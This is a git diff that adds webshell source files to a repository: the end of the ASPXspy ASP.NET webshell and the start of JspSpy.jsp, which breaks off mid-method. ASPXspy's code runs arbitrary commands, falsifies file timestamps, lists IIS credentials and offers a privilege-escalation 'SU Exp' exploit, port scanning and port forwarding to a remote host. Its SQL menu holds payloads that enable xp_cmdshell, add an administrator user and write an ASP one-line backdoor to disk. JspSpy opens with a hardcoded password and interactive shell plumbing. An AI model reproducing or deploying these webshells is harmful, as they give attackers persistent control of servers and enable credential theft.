+File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.System);

+}

+if(ccB.Checked)

+{

+File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Hidden);

+}

+if(fbyZ.Checked)

+{

+File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Archive);

+}

+File.SetCreationTimeUtc(path,Convert.ToDateTime(yUqx.Value));

+File.SetLastAccessTimeUtc(path,Convert.ToDateTime(aLsn.Value));

+File.SetLastWriteTimeUtc(path,Convert.ToDateTime(uYjw.Value));

+xseuB("File attributes modify success!");

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+krIR(AXSbb.Value);

+}

+protected void VOxn(object sender,EventArgs e)

+{

+WICxe();

+vIac.Visible=true;

+Bin_H2_Title.InnerText="Execute Command >>";

+}

+protected void FbhN(object sender,EventArgs e)

+{

+try

+{

+Process ahAE=new Process();

+ahAE.StartInfo.FileName=kusi.Value;

+ahAE.StartInfo.Arguments=bkcm.Value;

+ahAE.StartInfo.UseShellExecute=false;

+ahAE.StartInfo.RedirectStandardInput=true;

+ahAE.StartInfo.RedirectStandardOutput=true;

+ahAE.StartInfo.RedirectStandardError=true;

+ahAE.Start();

+string Uoc=ahAE.StandardOutput.ReadToEnd();

+Uoc=Uoc.Replace("<","&lt;");

+Uoc=Uoc.Replace(">","&gt;");

+Uoc=Uoc.Replace("\r\n","<br>");

+tnQRF.Visible=true;

+tnQRF.InnerHtml="<hr width=\"100%\" noshade/><pre>"+Uoc+"</pre>";

+}

+catch(Exception error)

+{

+xseuB(error.Message);

+}

+}

+protected void RAFL(object sender,EventArgs e)

+{

+if(qPdI.Text.Length>0)

+{

+tpRQ(qPdI.Text);

+}

+else

+{

+lFAvw();

+}

+}

+protected void Grxk(object sender,EventArgs e)

+{

+YUw();

+}

+protected void ilC(object sender,EventArgs e)

+{

+tZRH();

+}

+protected void HtB(object sender,EventArgs e)

+{

+pDVM();

+}

+protected void Olm(object sender,EventArgs e)

+{

+iLVUT();

+}

+protected void jXhS(object sender,EventArgs e)

+{

+ADCpk();

+}

+protected void lRfRj(object sender,EventArgs e)

+{

+lDODR();

+}

+protected void xSy(object sender,EventArgs e)

+{

+xFhz();

+}

+protected void dMx(object sender,EventArgs e)

+{

+rAhe();

+}

+protected void zOVO(object sender,EventArgs e)

+{

+if(((DropDownList)sender).ID.ToString()=="WYmo")

+{

+dQIIF.Visible=false;

+MasR.Text=WYmo.SelectedItem.Value.ToString();

+}

+if(((DropDownList)sender).ID.ToString()=="Pvf")

+{

+xTZY();

+}

+if(((DropDownList)sender).ID.ToString()=="FGEy")

+{

+jHIy.InnerText=FGEy.SelectedItem.Value.ToString();

+}

+if(((DropDownList)sender).ID.ToString()=="NdCX")

+{

+gLKc(Sqon.Value);

+}

+}

+protected void IkkO(object sender,EventArgs e)

+{

+krIR(AXSbb.Value);

+}

+protected void BGY(object sender,EventArgs e)

+{

+vCf();

+}

+protected void cptS(object sender,EventArgs e)

+{

+vNCHZ();

+}

+protected void fDO(object sender,EventArgs e)

+{

+MHLv();

+}

+protected void vJNsE(object sender,EventArgs e)

+{

+vuou();

+xseuB("Clear All Thread ......");

+}

+protected void wDZ(object sender,EventArgs e)

+{

+if(iXdh.Value=="" || eEpm.Value.Length<7 || ZHS.Value=="")return;

+ruQO();

+xseuB("All Thread Start ......");

+}

+protected void tYoZ(object sender,EventArgs e)

+{

+}

+protected void ELkQ(object sender,EventArgs e)

+{

+VikG();

+GBYT.Visible=true;

+string res=string.Empty;

+foreach(ScanPort th in IVc)

+{

+res+=th.ip+" : "+th.port+" ................................. "+th.status+"<br>";

+}

+GBYT.InnerHtml=res;

+}

+protected void ORUgV(object sender,EventArgs e)

+{

+dwgT();

+}

+public void WICxe()

+{

+DCbS.Visible=false;

+CzfO.Visible=false;

+APl.Visible=false;

+vIac.Visible=false;

+kkHN.Visible=false;

+YwLB.Visible=false;

+iDgmL.Visible=false;

+hOWTm.Visible=false;

+vrFA.Visible=false;

+yhv.Visible=false;

+}

+</script>

+<html xmlns="http://www.w3.org/1999/xhtml" >

+<head id="Head1" runat="server">

+<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>

+<title>ASPXspy</title>

+<style type="text/css">

+.Bin_Style_Login{font:11px Verdana;BACKGROUND: #FFFFFF;border: 1px solid #666666;}

+body,td{font: 12px Arial,Tahoma;line-height: 16px;}

+.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:16px;}

+.list{font:12px Arial,Tahoma;height:23px;}

+.area{font:12px 'Courier New',Monospace;background:#fff;border: 1px solid #666;padding:2px;}

+.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}

+a {color: #00f;text-decoration:underline;}

+a:hover{color: #f00;text-decoration:none;}

+.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ededed;padding:5px 10px 5px 5px;}

+.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#fafafa;padding:5px 10px 5px 5px;}

+.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}

+.head td{border-top:1px solid #ddd;border-bottom:1px solid #ccc;background:#e8e8e8;padding:5px 10px 5px 5px;font-weight:bold;}

+.head td span{font-weight:normal;}

+form{margin:0;padding:0;}

+h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}

+ul.info li{margin:0;color:#444;line-height:24px;height:24px;}

+u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}

+.u1{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}

+.u2{text-decoration: none;color:#777;float:left;display:block;width:350px;margin-right:10px;}

+</style>

+<script type="text/javascript">

+function CheckAll(form){

+for(var i=0;i<form.elements.length;i++){

+var e=form.elements[i];

+if(e.name!='chkall')

+e.checked=form.chkall.checked;

+}

+}

+</script>

+</head>

+<body style="margin:0;table-layout:fixed;">

+<form id="ASPXSpy" runat="server">

+<div id="ljtzC" runat="server" style=" margin:15px" enableviewstate="false" visible="false" >

+<span style="font:11px Verdana;">Password:</span>

+<asp:TextBox ID="HRJ" runat="server" Columns="20" CssClass="Bin_Style_Login" ></asp:TextBox>

+<asp:Button ID="ZSnXu" runat="server" Text="Login" CssClass="Bin_Style_Login" OnClick="xVm"/><p/>

+Copyright &copy; 2009 Bin -- <a href="http://www.rootkit.net.cn" target="_blank">www.rootkit.net.cn</a>

+</div>

+<div id="ZVS" runat="server">

+<div id="Zzj" runat="server">

+<table width="100%" border="0" cellpadding="0" cellspacing="0">

+<tr class="head">

+<td ><span style="float:right;"><a href="http://www.rootkit.net.cn" target="_blank">ASPXSpy Ver: 2009</a></span><span id="miansha2" runat="server" enableviewstate="true"></span></td>

+</tr>

+<tr class="alt1">

+<td><span style="float:right;" id="Bin_Span_FrameVersion" runat="server"></span>

+<asp:LinkButton ID="UtkN" runat="server" OnClick="YKpI" Text="Logout" ></asp:LinkButton> | <asp:LinkButton ID="RsqhW" runat="server" Text="File Manager" OnClick="Ybg"></asp:LinkButton> | <asp:LinkButton ID="xxzE" runat="server" Text="CmdShell" OnClick="VOxn"></asp:LinkButton> | <asp:LinkButton ID="nuc" runat="server" Text="IIS Spy" OnClick="KjPi"></asp:LinkButton> | <asp:LinkButton ID="OREpx" runat="server" Text="Process" OnClick="Grxk"></asp:LinkButton> | <asp:LinkButton ID="jHN" runat="server" Text="Services" OnClick="ilC"></asp:LinkButton> | <asp:LinkButton ID="PHq" runat="server" Text="UserInfo" OnClick="Olm"></asp:LinkButton> | <asp:LinkButton ID="wmgnK" runat="server" Text="SysInfo" OnClick="HtB"></asp:LinkButton> | <asp:LinkButton ID="FeV" runat="server" Text="FileSearch" OnClick="PPtK"></asp:LinkButton> | <asp:LinkButton ID="PVQ" runat="server" Text="SU Exp" OnClick="jXhS"></asp:LinkButton> | <asp:LinkButton ID="jNDb" runat="server" Text="RegShell" OnClick="xSy"></asp:LinkButton> | <asp:LinkButton ID="HDQ" runat="server" Text="PortScan" OnClick="cptS" ></asp:LinkButton> | <asp:LinkButton ID="AoI" runat="server" Text="DataBase" OnClick="dMx"></asp:LinkButton> | <asp:LinkButton ID="KHbEd" runat="server" Text="PortMap" OnClick="fDO"></asp:LinkButton>

+</td>

+</tr>

+</table>

+</div>

+<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>

+<div id="jDKt" style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;" runat="server" visible="false" enableviewstate="false"></div>

+<h2 id="Bin_H2_Title" runat="server"></h2>

+<%--FileList--%>

+<div id="CzfO" runat="server">

+<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">

+ <tr>

+<td style=" white-space:nowrap">Current Directory : </td>

+<td style=" width:100%"><input class="input" id="AXSbb" type="text" style="width:97%;margin:0 8px;" runat="server"/>

+</td>

+<td style="white-space:nowrap" ><asp:Button ID="xaGwl" runat="server" Text="Go" CssClass="bt" OnClick="EXV"/></td>

+ </tr>

+</table>

+<table width="100%" border="0" cellpadding="4" cellspacing="0">

+<tr class="alt1"><td colspan="7" style="padding:5px;">

+<div style="float:right;"><input id="Fhq" class="input" runat="server" type="file" style=" height:22px"/>

+<asp:Button ID="RvPp" CssClass="bt" runat="server" Text="Upload" OnClick="lbjLD"/></div><asp:LinkButton ID="OLJFp" runat="server" Text="WebRoot" OnClick="mcCY"></asp:LinkButton> | <a href="#" id="Bin_Button_CreateDir" runat="server">Create Directory</a> | <a href="#" id="Bin_Button_CreateFile" runat="server">Create File</a>

+ | <span id="Bin_Span_Drv" runat="server"></span><a href="#" id="Bin_Button_KillMe" runat="server" style="color:Red">Kill Me</a>

+</td></tr>

+<asp:Table ID="UGzP" runat="server" Width="100%" CellSpacing="0" >

+<asp:TableRow CssClass="head"><asp:TableCell>&nbsp;</asp:TableCell><asp:TableCell>Filename</asp:TableCell><asp:TableCell Width="25%">Last modified</asp:TableCell><asp:TableCell Width="15%">Size</asp:TableCell><asp:TableCell Width="25%">Action</asp:TableCell></asp:TableRow>

+</asp:Table>

+</table>

+</div>

+<%--FileEdit--%>

+<div id="vrFA" runat="server">

+<p>Current File(import new file name and new file)<br/>

+<input class="input" id="Sqon" type="text" size="100" runat="server"/> <asp:DropDownList ID="NdCX" runat="server" CssClass="list" AutoPostBack="true" OnSelectedIndexChanged="zOVO"><asp:ListItem>Default</asp:ListItem><asp:ListItem>UTF-8</asp:ListItem></asp:DropDownList>

+</p>

+<p>File Content<br/>

+<textarea id="Xgvv" runat="server" class="area" cols="100" rows="25" enableviewstate="true" ></textarea>

+</p>

+<p><asp:Button ID="JJjbW" runat="server" Text="Submit" CssClass="bt" OnClick="DGCoW"/> <asp:Button ID="iCNu" runat="server" Text="Back" CssClass="bt" OnClick="IkkO"/></p>

+</div>

+<%--CloneTime--%>

+<div id="zRyG" runat="server" enableviewstate="false" visible="false">

+<p>Alter file<br/><input class="input" id="QiFB" type="text" size="120" runat="server"/></p>

+<p>Reference file(fullpath)<br/><input class="input" id="lICp" type="text" size="120" runat="server"/></p>

+<p><asp:Button ID="JEaxV" runat="server" Text="Submit" CssClass="bt" OnClick="XXrLw"/></p>

+<h2>Set last modified &raquo;</h2>

+<p>Current file(fullpath)<br/><input class="input" id="pWVL" type="text" size="120" runat="server"/></p>

+<p>

+<asp:CheckBox ID="ZhWSK" runat="server" Text="ReadOnly" EnableViewState="False"/>

+&nbsp;

+<asp:CheckBox ID="SsR" runat="server" Text="System" EnableViewState="False"/>

+&nbsp;

+<asp:CheckBox ID="ccB" runat="server" Text="Hidden" EnableViewState="False"/>

+&nbsp;

+<asp:CheckBox ID="fbyZ" runat="server" Text="Archive" EnableViewState="False"/>

+</p>

+<p>

+CreationTime :

+<input class="input" id="yUqx" type="text" runat="server"/>

+LastWriteTime :

+<input class="input" id="uYjw" type="text" runat="server"/>

+LastAccessTime :

+<input class="input" id="aLsn" type="text" runat="server"/>

+</p>

+<p>

+<asp:Button ID="kOG" CssClass="bt" runat="server" Text="Submit" OnClick="tIykC"/>

+</p>

+</div>

+<%--IISSpy--%>

+<div runat="server" id="VNR" visible="false" enableviewstate="false">

+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">

+<asp:Table ID="GlI" runat="server" Width="100%" CellSpacing="0">

+<asp:TableRow CssClass="head"><asp:TableCell>ID</asp:TableCell><asp:TableCell>IIS_USER</asp:TableCell><asp:TableCell>IIS_PASS</asp:TableCell><asp:TableCell>Domain</asp:TableCell><asp:TableCell>Path</asp:TableCell></asp:TableRow>

+</asp:Table>

+</table>

+</div>

+<%--Process--%>

+<div runat="server" id="DCbS" visible="false" enableviewstate="false">

+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">

+<asp:Table ID="IjsL" runat="server" Width="100%" CellSpacing="0" >

+<asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Process</asp:TableCell><asp:TableCell>ThreadCount</asp:TableCell><asp:TableCell>Priority</asp:TableCell><asp:TableCell>Action</asp:TableCell></asp:TableRow>

+</asp:Table>

+</table>

+</div>

+<%--CmdShell--%>

+<div runat="server" id="vIac">

+ <p>CmdPath:<br/>

+ <input class="input" runat="server" id="kusi" type="text" size="100" value="c:\windows\system32\cmd.exe"/>

+ </p>

+ Argument:<br/>

+ <input class="input" runat="server" id="bkcm" value="/c Set" type="text" size="100"/> <asp:Button ID="YrqL" CssClass="bt" runat="server" Text="Submit" OnClick="FbhN"/>

+ <div id="tnQRF" runat="server" visible="false" enableviewstate="false">

+ </div>

+</div>

+<%--Services--%>

+<div runat="server" id="iQxm" visible ="false" enableviewstate="false">

+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">

+<asp:Table ID="vHCs" runat="server" Width="100%" CellSpacing="0" >

+<asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Name</asp:TableCell><asp:TableCell>Path</asp:TableCell><asp:TableCell>State</asp:TableCell><asp:TableCell>StartMode</asp:TableCell></asp:TableRow>

+</asp:Table>

+</table>

+</div>

+<%--Sysinfo--%>

+<div runat="server" id="ghaB" visible="false" enableviewstate="false">

+<hr style=" border: 1px solid #ddd;height:0px;"/>

+<ul class="info" id="Bin_Ul_Sys" runat="server"></ul>

+<h2 id="Bin_H2_Mac" runat="server"></h2>

+<hr style=" border: 1px solid #ddd;height:0px;"/>

+<ul class="info" id ="Bin_Ul_NetConfig" runat="server"></ul>

+<h2 id="Bin_H2_Driver" runat="server"></h2>

+<hr style=" border: 1px solid #ddd;height:0px;"/>

+<ul class="info" id ="Bin_Ul_Driver" runat="server"></ul>

+</div>

+<%--UserInfo--%>

+<div runat="server" id="xWVQ" visible="false" enableviewstate="false">

+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">

+<asp:Table ID="VPa" runat="server" Width="100%" CellSpacing="0" >

+</asp:Table>

+</table>

+</div>

+<%--SuExp--%>

+ <div runat="server" id="APl">

+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">

+ <tr align="center">

+ <td style="width:10%"></td>

+ <td style="width:20%" align="left">UserName : <input class="input" runat="server" id="dNohJ" type="text" size="20" value="localadministrator"/></td>

+ <td style="width:20%" align="left">PassWord : <input class="input" runat="server" id="NMd" type="text" size="20" value="#l@$ak#.lk;0@P"/></td>

+ <td style="width:20%" align="left">Port : <input class="input" runat="server" id="HlQl" type="text" size="20" value="43958"/></td>

+ <td style="width:10%"></td>

+ </tr>

+ <tr >

+ <td style="width:10%"></td>

+ <td colspan="5">CmdShell&nbsp;&nbsp;:&nbsp;<input class="input" runat="server" id="mHbjB" type="text" size="100" value="cmd.exe /c net user"/> <asp:Button ID="SPhc" CssClass="bt" runat="server" Text="Exploit" OnClick="lRfRj"/></td>

+ </tr>

+</table>

+<div id="UHlA" visible="false" enableviewstate="false" runat="server">

+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">

+<tr align="center">

+<td style="width:30%"></td>

+<td align="left" style="width:40%"><pre id="Bin_Td_Res" runat="server"></pre></td>

+<td style="width:30%"></td>

+</tr>

+</table>

+</div>

+</div>

+<%--Reg--%>

+<div id="kkHN" runat="server">

+<p>Registry Path : <asp:TextBox id="qPdI" style="width:85%;margin:0 8px;" CssClass="input" runat="server"/><asp:Button ID="MoNA" runat="server" Text="Go" CssClass="bt" onclick="RAFL"/></p>

+<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">

+<asp:Table ID="pLWD" runat="server" Width="100%" CellSpacing="0" >

+<asp:TableRow CssClass="alt1"><asp:TableCell ColumnSpan="2" id="vyX"></asp:TableCell></asp:TableRow>

+<asp:TableRow CssClass="head"><asp:TableCell Width="40%">Key</asp:TableCell><asp:TableCell Width="60%">Value</asp:TableCell></asp:TableRow>

+</asp:Table>

+</table>

+</div>

+<%--PortScan--%>

+<div id="YwLB" runat="server">

+<p>

+IP : <asp:TextBox id="MdR" style="width:10%;margin:0 8px;" CssClass="input" runat="server" Text="127.0.0.1"/> Port : <asp:TextBox id="lOmX" style="width:40%;margin:0 8px;" CssClass="input" runat="server" Text="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"/> <asp:Button ID="CmUCh" runat="server" Text="Scan" CssClass="bt" OnClick="ELkQ"/>

+</p>

+<div id="GBYT" runat="server" visible="false" enableviewstate="false"></div>

+</div>

+<%--DataBase--%>

+<div id="iDgmL" runat="server">

+<p>ConnString : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssClass="input" runat="server"/><asp:DropDownList runat="server" CssClass="list" ID="WYmo" AutoPostBack="True" OnSelectedIndexChanged="zOVO" ><asp:ListItem></asp:ListItem><asp:ListItem Value="server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB">MSSQL</asp:ListItem><asp:ListItem Value="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\database.mdb">ACCESS</asp:ListItem></asp:DropDownList><asp:Button ID="QcZPA" runat="server" Text="Go" CssClass="bt" OnClick="BGY"/></p>

+<div id="dQIIF" runat="server">

+<div id="irTU" runat="server"></div>

+<div id="uXevN" runat="server">

+Please select a database : <asp:DropDownList runat="server" ID="Pvf" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"></asp:DropDownList>

+SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"><asp:ListItem Value="">-- SQL Server Exec --</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')">Add xp_cmdshell</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('sp_OACreate','odsole70.dll')">Add sp_oacreate</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;">Add xp_cmdshell(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;">Add sp_oacreate(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE;">Add makewebtask(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;">Add openrowset/opendatasource(SQL2005)</asp:ListItem><asp:ListItem Value="Exec master.dbo.xp_cmdshell 'net user'">XP_cmdshell exec</asp:ListItem><asp:ListItem Value="EXEC MASTER..XP_dirtree 'c:\',1,1">XP_dirtree</asp:ListItem><asp:ListItem Value="Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^&lt;%execute(request(char(35)))%^>>c:\bin.asp';">SP_oamethod exec</asp:ListItem><asp:ListItem Value="sp_makewebtask @outputfile='c:\bin.asp',@charset=gb2312,@query='select ''&lt;%execute(request(chr(35)))%&gt;'''">SP_makewebtask make file</asp:ListItem><asp:ListItem Value="exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell(&#34;cmd.exe /c net user root root/add &#34;)')">SandBox</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];">LogBackup</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='c:\bin.asp' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];">DatabaseBackup</asp:ListItem></asp:DropDownList>

+</div>

+<table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td> Run SQL </td></tr><tr><td><textarea id="jHIy" class="area" style="width:600px;height:60px;overflow:auto;" runat="server" rows="6" cols="1"></textarea></td></tr><tr><td>

+<asp:Button runat="server" ID="WOhJ" CssClass="bt" Text="Query" onclick="ORUgV"/></td></tr></table>

+<div style="overflow-x:auto;width:950px" >

+<p>

+<asp:DataGrid runat="server" ID="rom" HeaderStyle-CssClass="head" BorderWidth="0" GridLines="None" ></asp:DataGrid>

+</p>

+</div>

+</div>

+</div>

+<%--PortMap--%>

+<div id="hOWTm" runat="server">

+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">

+<tr align="center">

+<td style="width:5%"></td>

+<td style="width:20%" align="left">Local Ip : <input class="input" runat="server" id="eEpm" type="text" size="20" value="127.0.0.1"/></td>

+<td style="width:20%" align="left">Local Port : <input class="input" runat="server" id="iXdh" type="text" size="20" value="3389"/></td>

+<td style="width:20%" align="left">Remote Ip : <input class="input" runat="server" id="llH" type="text" size="20" value="www.rootkit.net.cn"/></td>

+<td style="width:20%" align="left">Remote Port : <input class="input" runat="server" id="ZHS" type="text" size="20" value="80"/></td></tr>

+<tr align="center"><td colspan="5"><br/><asp:Button ID="FJE" CssClass="bt" runat="server" Text="MapPort" OnClick="wDZ"/> <asp:Button ID="giX" CssClass="bt" runat="server" Text="ClearAll" OnClick="vJNsE"/> <asp:Button ID="GFsm" CssClass="bt" runat="server" Text="Refresh" OnClick="tYoZ"/></td></tr></table></div>

+<%--Search--%>

+<div id="yhv" runat="server">

+<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">

+<tr align="center">

+<td style="width:20%" align="left">Keyword</td>

+<td style="width:60%" align="left"><textarea id="iaMKl" runat="server" class="area" style="width:100%" rows="4"></textarea></td>

+<td style="width:20%" align="left"><input type="checkbox" runat="server" id="rAQ" value="1"/> Use Regex</td>

+</tr>

+<tr align="center">

+<td style="width:20%" align="left">Replace As</td>

+<td style="width:60%" align="left"><textarea id="qPe" runat="server" class="area" style="width:100%" rows="4"></textarea></td>

+<td style="width:20%" align="left"><input type="checkbox" runat="server" id="YZw"/> Replace</td>

+</tr>

+<tr align="center">

+<td style="width:20%" align="left">Search FileType</td>

+<td style="width:60%" align="left"><input type="text" runat="server" class="input" id="UDLvA" style="width:100%" value="asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config"/></td>

+<td style="width:20%" align="left"><asp:DropDownList runat="server" ID="Ven" AutoPostBack="False" CssClass="list"><asp:ListItem Value="name">File Name</asp:ListItem><asp:ListItem Value="content" Selected="True">File Content</asp:ListItem></asp:DropDownList></td>

+</tr>

+<tr align="center">

+<td style="width:20%" align="left">Path</td>

+<td style="width:60%" align="left"><input type="text" class="input" id="NaLJ" runat="server" style="width:100%" /></td>

+<td style="width:20%" align="left"><asp:Button CssClass="bt" id="axy" runat="server" onclick="NBy" Text="Start" /></td>

+</tr>

+</table>

+<br/>

+<br/>

+<asp:Table ID="oJiym" runat="server" Width="100%" CellSpacing="0" >

+<asp:TableRow CssClass="head"><asp:TableCell Width="60%">File Path</asp:TableCell><asp:TableCell Width="20%">Last modified</asp:TableCell><asp:TableCell Width="20%">Size</asp:TableCell></asp:TableRow>

+</asp:Table>

+</div>

+</td></tr></table>

+<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;"></div></div>

+</form>
\ No newline at end of file
diff --git a/jsp/JspSpy.jsp b/jsp/JspSpy.jsp
new file mode 100644
index 0000000..f167745
--- /dev/null
+++ b/jsp/JspSpy.jsp
@@ -0,0 +1,2344 @@
+锘�<%@page pageEncoding="utf-8"%>
+<%@page import="java.io.*"%>
+<%@page import="java.util.*"%>
+<%@page import="java.util.regex.*"%>
+<%@page import="java.sql.*"%>
+<%@page import="java.nio.charset.*"%>
+<%@page import="javax.servlet.http.HttpServletRequestWrapper"%>
+<%@page import="java.text.*"%>
+<%@page import="java.net.*"%>
+<%@page import="java.util.zip.*"%>
+<%@page import="java.awt.*"%>
+<%@page import="java.awt.image.*"%>
+<%@page import="javax.imageio.*"%>
+<%@page import="java.awt.datatransfer.DataFlavor"%>
+<%@page import="java.util.prefs.Preferences"%>
+<%!
+/**
+* Code By Ninty
+* Date 2009-12-17
+* Blog http://www.Forjj.com/
+* Yue . I Love You.
+*/
+private static final String PW = "ninty"; //password
+private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd";
+private static final String REQUEST_CHARSET = "ISO-8859-1";
+private static final String PAGE_CHARSET = "UTF-8";
+private static final String CURRENT_DIR = "currentdir";
+private static final String MSG = "SHOWMSG";
+private static final String PORT_MAP = "PMSA";
+private static final String DBO = "DBO";
+private static final String SHELL_ONLINE = "SHELL_ONLINE";
+private static String SHELL_NAME = "";
+private static String WEB_ROOT = null; 
+private static String SHELL_DIR = null;
+public static Map<String,Invoker> ins = new HashMap<String,Invoker>();
+private static class MyRequest extends HttpServletRequestWrapper {
+public MyRequest(HttpServletRequest req) {
+super(req);
+}
+public String getParameter(String name) {
+try {
+String value = super.getParameter(name);
+if (name == null)
+return null;
+return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET);
+} catch (Exception e) {
+return null;
+}
+}
+}
+private static class DBOperator{
+private Connection conn = null;
+private Statement stmt = null;
+private String driver;
+private String url;
+private String uid;
+private String pwd;
+public DBOperator(String driver,String url,String uid,String pwd) throws Exception {
+this(driver,url,uid,pwd,false);
+}
+public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception {
+Class.forName(driver);
+if (connect)
+this.conn = DriverManager.getConnection(url,uid,pwd);
+this.url = url;
+this.driver = driver;
+this.uid = uid;
+this.pwd = pwd;
+}
+public void connect() throws Exception{
+this.conn = DriverManager.getConnection(url,uid,pwd);
+}
+public Object execute(String sql) throws Exception {
+if (isValid()) {
+stmt = conn.createStatement();
+if (stmt.execute(sql)) {
+return stmt.getResultSet();
+} else {
+return stmt.getUpdateCount();
+}
+}
+throw new Exception("Connection is inValid.");
+}
+public void closeStmt() throws Exception{
+if (this.stmt != null)
+stmt.close();
+}
+public boolean isValid() throws Exception {
+return conn != null && !conn.isClosed();
+}
+public void close() throws Exception {
+if (isValid()) {
+closeStmt();
+conn.close();
+}
+}
+public boolean equals(Object o) {
+if (o instanceof DBOperator) {
+DBOperator dbo = (DBOperator)o;
+return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd);
+}
+return false;
+}
+}
+private static class StreamConnector extends Thread {
+private InputStream is;
+private OutputStream os;  
+public StreamConnector( InputStream is, OutputStream os ){
+this.is = is;
+this.os = os;
+}			  
+public void run(){
+BufferedReader in  = null;
+BufferedWriter out = null;
+try{
+in  = new BufferedReader( new InputStreamReader(this.is));
+out = new BufferedWriter( new OutputStreamWriter(this.os));
+char buffer[] = new char[8192];
+int length;
+while((length = in.read( buffer, 0, buffer.length ))>0){
+out.write( buffer, 0, length );
+out.flush();
+}
+} catch(Exception e){}
+try{
+if(in != null)
+in.close();
+if(out != null)
+out.close();
+} catch( Exception e ){}
+}
+}
+private static class OnLineProcess {
+private String cmd = "first";
+private Process pro;
+public OnLineProcess(Process p){
+this.pro = p;
+}
+public void setPro(Process p) {
+this.pro = p;
+}
+public void setCmd(String c){
+this.cmd = c;
+}
+public String getCmd(){
+return this.cmd;
+}
+public Process getPro(){
+return this.pro;
+}
+public void stop(){
+this.pro.destroy();
+}
+}
+private static class OnLineConnector extends Thread {
+private OnLineProcess ol = null;
+private InputStream is;
+private OutputStream os;
+private String name;
+public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){
+this.is = is;
+this.os = os;
+this.name = name;
+this.ol = ol;
+}
+public void run(){
+BufferedReader in  = null;
+BufferedWriter out = null;
+try{
+in  = new BufferedReader( new InputStreamReader(this.is));
+out = new BufferedWriter( new OutputStreamWriter(this.os));
+char buffer[] = new char[128];
+if(this.name.equals("exeRclientO")) {
+//from exe to client
+int length = 0;
+while((length = in.read( buffer, 0, buffer.length ))>0){
+String str = new String(buffer, 0, length);
